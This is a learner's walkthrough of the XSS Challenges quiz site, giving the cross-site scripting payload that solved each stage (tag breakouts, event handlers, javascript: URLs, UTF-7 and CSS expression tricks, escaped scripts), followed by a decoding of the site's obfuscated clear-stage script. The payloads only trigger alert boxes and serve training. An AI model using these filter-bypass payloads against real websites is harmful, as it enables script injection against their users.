XSS Challenges

Here's my journal of solving all the XSS Challenges written by yamagata21 at http://xss-quiz.int21h.jp/. This is a starter level for people who want to learn some cross-site scripting and the several ways to inject in different browsers.

XSS Challenges http://xss-quiz.int21h.jp

Stage1: http://xss-quiz.int21h.jp
Solution: <script>alert(document.domain);</script>

Stage2: http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70
Solution: "><script>alert( alert(document.domain))</script>

Stage3: http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d
Solution: The input in the text box is properly escaped, so inject "><script>alert(document.domain);</script> in the select field

Stage4: http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e
Solution: "><script>alert(document.domain);</script> in hidden field

Stage5: http://xss-quiz.int21h.jp/stage--5.php?sid=e9dd07b6e86c5314a2e574e887faa9482de330bf
Solution: " onmouseover="alert(document.domain);" type="text (after changing the length in the input text)

Stage6: http://xss-quiz.int21h.jp/stage-no6.php?sid=b76ebfa651652f2c22f8ddbe264941287667706c
Solution: " onmouseover="alert(document.domain);"

Stage7: http://xss-quiz.int21h.jp/stage07.php?sid=f433ab35e367d5a94100aa4e0f694c3e63d67105
Solution: x onmouseover=alert(document.domain);

Stage8: http://xss-quiz.int21h.jp/stage008.php?sid=4301b185b563c91208e0af232d7f016885e863e0
Solution: javascript:alert(document.domain);

Stage9: UTF-7: not working for me, extracted the next level from the deobfuscated URL.
http://xss-quiz.int21h.jp/stage_09.php?sid=558484a712d793c446e3dc409601eaf126e73d25

Solution: +ACI- onmouseover=+ACI-alert(document.domain)+ADsAIg- x=+ACI-
p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg-&charset=euc-jp

Stage10: http://xss-quiz.int21h.jp/stage00010.php?sid=1b96f5c206c187751811fb9267a02c109c7e1276
Solution: " onmouseover=alert(document.domdomainain); x="

Stage11: http://xss-quiz.int21h.jp/stage11th.php?sid=756e90d9a168c24e2abbc43d1f4409ce6ff70de3
Solution: "><a href="javascr	ipt:alert(document.domain);">XSS</a>

Passed with IE
Stage12: http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb
Solution: ``onmouseover=alert(document.domain);

Passed with IE
Stage13: http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad
Solution: xss:expression(alert(document.domain));"

Passed with IE
Stage14: http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8
Solution: xss:expre/**/ssion(alert(document.domain));"

Stage15: http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726
Solution: \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

Stage16: http://xss-quiz.int21h.jp/stage00000016.php?sid=67973758e07ac879612c31437a2e1fb283b760e7
Solution: \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

Skipped: (old IE not available)
http://xss-quiz.int21h.jp/stage-No17.php?sid=53342e06720dc7d4fa4224eb3c13bf966d823056
http://xss-quiz.int21h.jp/stage__No18.php?sid=170f1d30f88cf627174033ec5b73578276b94fc3

Stage19: http://xss-quiz.int21h.jp/stage_--19.php?sid=787870a01e603b0c0d0d6c464c0595883e2c10ce
Solution: It's the Twitter DOM XSS bug (24 Sept. 2010) -- #!javascript:alert(document.domain)

Clear Stage: To enter the ranking, deobfuscate the JS in this part of the code:
ty = "";
o = unescape("foejoh");
// Shift every character code down by one: "foejoh" -> "ending"
for (var i = 0; i < o.length; i++) {
    var y = o.charCodeAt(i);
    ty += String.fromCharCode(y - 1);
}
ty = escape(ty);
if (ty == "ending") {
    sj = "\062\060"; // octal escapes for "20"
    alert("Congratulations!! All Stages Clear!!!");
    alert("\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php");
    document.location = "\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php";
} else {
    document.all("msg").innerHTML = "<span id='h3'>Congratulations!!</span>   " + "Next stage <a href=\"" + ty + "\">" + ty + "</a>.";
}

So, with sj = "\062\060" decoding to "20", "\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php" is RankIng20.php :-)

Final URL that allows direct entry to the clear stage: http://xss-quiz.int21h.jp/RankIng20.php
Ranking: http://xss-quiz.int21h.jp/ranking.php
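
The clear-stage decoding worked out above can be reproduced statically, without running the page's script. The following is an added example, not code from the challenge site or from this journal; the function names decodeJsEscapes, shiftDecode and resolveTarget are hypothetical, and the input "tubhf3/qiq" is constructed.

```javascript
// Added example (not the challenge's code): resolve the obfuscated strings
// statically instead of running the page's script. Names are hypothetical.

// Decode escape sequences in the raw source text of a JS string literal.
// Handles \xHH, \uHHHH, legacy octal (\062) and single-character escapes.
function decodeJsEscapes(raw) {
  const simple = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f", v: "\v" };
  const re = /\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([0-3][0-7]{0,2}|[4-7][0-7]?)|(.))/g;
  return raw.replace(re, (match, hex, uni, oct, other) => {
    if (hex !== undefined) return String.fromCharCode(parseInt(hex, 16));
    if (uni !== undefined) return String.fromCharCode(parseInt(uni, 16));
    if (oct !== undefined) return String.fromCharCode(parseInt(oct, 8));
    return Object.prototype.hasOwnProperty.call(simple, other) ? simple[other] : other;
  });
}

// Same loop as the page's script: unescape(), then char code minus 1.
function shiftDecode(encoded) {
  const o = unescape(encoded);
  let ty = "";
  for (let i = 0; i < o.length; i++) {
    ty += String.fromCharCode(o.charCodeAt(i) - 1);
  }
  return ty;
}

// Follow the script's branch: "ending" leads to the ranking page, anything
// else is the file name of the next stage.
function resolveTarget(encoded, prefixRaw, sjRaw) {
  const ty = escape(shiftDecode(encoded));
  if (ty === "ending") {
    return decodeJsEscapes(prefixRaw) + decodeJsEscapes(sjRaw) + ".php";
  }
  return ty;
}

// Raw literal text copied from the script above (backslashes doubled so the
// escapes stay undecoded until decodeJsEscapes runs).
const PREFIX_RAW = "\\x52\\x61\\x6e\\x6b\\x49\\x6e\\x67";
const SJ_RAW = "\\062\\060";

console.log(shiftDecode("foejoh"));
console.log(resolveTarget("foejoh", PREFIX_RAW, SJ_RAW));
// Constructed input (not from the site): "stage2.php" with each char code + 1.
console.log(resolveTarget("tubhf3/qiq", PREFIX_RAW, SJ_RAW));
```

Decoding the literals as text keeps the analysis independent of document.all and the alert/redirect side effects in the original script.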

 
